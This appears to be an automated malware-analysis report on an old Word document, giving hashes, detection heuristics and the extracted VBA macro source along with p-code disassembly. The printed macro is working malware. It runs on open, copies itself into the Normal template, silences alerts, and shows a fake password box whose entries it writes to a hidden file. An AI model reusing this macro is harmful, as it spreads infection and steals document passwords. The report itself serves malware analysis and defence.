Office (OLE) malware analysis — malicious · 6246cabfbe2c88aa

MALICIOUS

Office (OLE)

30.5 KB Created: 1998-01-01 00:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 529c8c245454a5af518bd660c0e3a39e SHA-1: 46ab96c9385b7641233bd5d23db6383a0e5cc919 SHA-256: 6246cabfbe2c88aa5fbbfa111291714bd57b69f6112ac6c9a8c3feb254f8dd15

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing a VBA macro with an AutoOpen subroutine, indicating it is designed to execute automatically upon opening. The macro attempts to copy itself to the Normal template, a common technique for establishing persistence or spreading malware. While the full execution flow is truncated, the presence of the AutoOpen macro and the heuristic firings strongly suggest a malicious intent to execute arbitrary code.

Heuristics 3

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7786 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7786 bytes
SHA-256: `90883139a3de1c33f92acdb4969d3f0fb4b670aaf56ec6291ecec482f49d6450`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "fake®" Sub AutoOpen() ' Macro criada por Daniel !!! On Error GoTo Final Application.ScreenUpdating = False Application.DisplayAlerts = wdAlertsNone WordBasic.DisableAutoMacros 0 Options.VirusProtection = True Set ActiveDoc = ActiveDocument Set GlobalDoc = NormalTemplate DocumentInstalled = False GlobalInstalled = False For I = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(I).Name = "fake®" Then DocumentInstalled = True End If Next For J = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(J).Name = "fake®" Then GlobalInstalled = True End If Next If DocumentInstalled = False Then Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="fake®", Object:=wdOrganizerObjectProjectItems ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="PassBox", Object:=wdOrganizerObjectProjectItems ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate End If If GlobalInstalled = False Then Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="fake®", Object:=wdOrganizerObjectProjectItems Options.SaveNormalPrompt = False Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="PassBox", Object:=wdOrganizerObjectProjectItems Options.SaveNormalPrompt = False End If If ActiveDocument.HasPassword = False Then GoTo Final PassBox.Show Call Abre Final: End Sub Function Abre() On Error Resume Next SetAttr "C:\IO.SDX", 0 Open "C:\IO.SDX" For Append As #1 Print #1, "Path = " + ActiveDocument.FullName Print #1, "Password = " + PassBox.TextBox1 Print #1, " " Close #1 SetAttr "C:\IO.SDX", 1 + 2 + 4 Application.DisplayAlerts = wdAlertsAll Unload PassBox End Function Attribute VB_Name = "NewMacros" ' Processing file: /opt/analyzer/scan_staging/49b5367e64e8498ebc7facb82a0d40cb.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1117 bytes ' Macros/VBA/fake® - 3481 bytes ' Line #0: ' FuncDefn (Sub AutoOpen()) ' Line #1: ' QuoteRem 0x0000 0x001C " Macro criada por Daniel !!!" ' Line #2: ' OnError Final ' Line #3: ' Line #4: ' LitVarSpecial (False) ' Ld Application ' MemSt ScreenUpdating ' Line #5: ' Ld wdAlertsNone ' Ld Application ' MemSt DisplayAlerts ' Line #6: ' Line #7: ' LitDI2 0x0000 ' Ld WordBasic ' ArgsMemCall DisableAutoMacros 0x0001 ' Line #8: ' LitVarSpecial (True) ' Ld Options ' MemSt VirusProtection ' Line #9: ' Line #10: ' Line #11: ' SetStmt ' Ld ActiveDocument ' Set ActiveDoc ' Line #12: ' SetStmt ' Ld NormalTemplate ' Set GlobalDoc ' Line #13: ' Line #14: ' LitVarSpecial (False) ' St DocumentInstalled ' Line #15: ' LitVarSpecial (False) ' St GlobalInstalled ' Line #16: ' Line #17: ' StartForVariable ' Ld I ' EndForVariable ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' MemLd Count ' For ' Line #18: ' Ld I ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd New ' LitStr 0x0005 "fake®" ' Eq ' IfBlock ' Line #19: ' LitVarSpecial (True) ' St DocumentInstalled ' Line #20: ' EndIfBlock ' Line #21: ' StartForVariable ' Next ' Line #22: ' Line #23: ' StartForVariable ' Ld ... (truncated)

SHA-256: 90883139a3de1c33f92acdb4969d3f0fb4b670aaf56ec6291ecec482f49d6450

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "fake®"
Sub AutoOpen()
' Macro criada por Daniel !!!
On Error GoTo Final

   Application.ScreenUpdating = False
   Application.DisplayAlerts = wdAlertsNone

   WordBasic.DisableAutoMacros 0
   Options.VirusProtection = True


   Set ActiveDoc = ActiveDocument
   Set GlobalDoc = NormalTemplate

   DocumentInstalled = False
   GlobalInstalled = False
   
  For I = 1 To ActiveDocument.VBProject.VBComponents.Count
      If ActiveDocument.VBProject.VBComponents(I).Name = "fake®" Then
         DocumentInstalled = True
      End If
   Next

   For J = 1 To NormalTemplate.VBProject.VBComponents.Count
      If NormalTemplate.VBProject.VBComponents(J).Name = "fake®" Then
        GlobalInstalled = True
      End If
   Next
   
      If DocumentInstalled = False Then
         Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="fake®", Object:=wdOrganizerObjectProjectItems
          ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
            Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="PassBox", Object:=wdOrganizerObjectProjectItems
              ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
      End If
           
     
      If GlobalInstalled = False Then
         Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="fake®", Object:=wdOrganizerObjectProjectItems
         Options.SaveNormalPrompt = False
            Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="PassBox", Object:=wdOrganizerObjectProjectItems
            Options.SaveNormalPrompt = False
      End If
        If ActiveDocument.HasPassword = False Then GoTo Final
     PassBox.Show
     Call Abre
Final:
    End Sub
    
Function Abre()
  
On Error Resume Next
SetAttr "C:\IO.SDX", 0
Open "C:\IO.SDX" For Append As #1
Print #1, "Path = " + ActiveDocument.FullName
Print #1, "Password = " + PassBox.TextBox1
Print #1, " "
Close #1
SetAttr "C:\IO.SDX", 1 + 2 + 4

Application.DisplayAlerts = wdAlertsAll
Unload PassBox

End Function

Attribute VB_Name = "NewMacros"

' Processing file: /opt/analyzer/scan_staging/49b5367e64e8498ebc7facb82a0d40cb.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1117 bytes
' Macros/VBA/fake® - 3481 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	QuoteRem 0x0000 0x001C " Macro criada por Daniel !!!"
' Line #2:
' 	OnError Final 
' Line #3:
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #5:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #6:
' Line #7:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #8:
' 	LitVarSpecial (True)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #9:
' Line #10:
' Line #11:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set ActiveDoc 
' Line #12:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set GlobalDoc 
' Line #13:
' Line #14:
' 	LitVarSpecial (False)
' 	St DocumentInstalled 
' Line #15:
' 	LitVarSpecial (False)
' 	St GlobalInstalled 
' Line #16:
' Line #17:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #18:
' 	Ld I 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0005 "fake®"
' 	Eq 
' 	IfBlock 
' Line #19:
' 	LitVarSpecial (True)
' 	St DocumentInstalled 
' Line #20:
' 	EndIfBlock 
' Line #21:
' 	StartForVariable 
' 	Next 
' Line #22:
' Line #23:
' 	StartForVariable 
' 	Ld
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.